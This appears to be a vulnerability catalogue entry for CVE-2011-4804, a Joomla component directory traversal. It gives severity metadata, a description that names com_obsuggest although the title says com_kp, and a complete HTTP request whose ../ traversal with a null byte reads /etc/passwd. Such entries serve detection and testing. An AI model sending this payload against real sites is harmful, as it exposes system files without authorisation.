| Title | Joomla! Component com_kp - 'Controller' Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | The vulnerability allows an attacker to include arbitrary local files, leading to unauthorized access to sensitive information or remote code execution. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.30722 |
| CVE ID | CVE-2011-4804 |
| CWE ID | CWE-22 |
| Tags | cve cve2011 lfi edb joomla foobla vuln |
A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
GET /index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2011/CVE-2011-4804.yaml
🦈 Packet Capture: ⬇️ Download cve-2011-4804.pcap
N/AN/A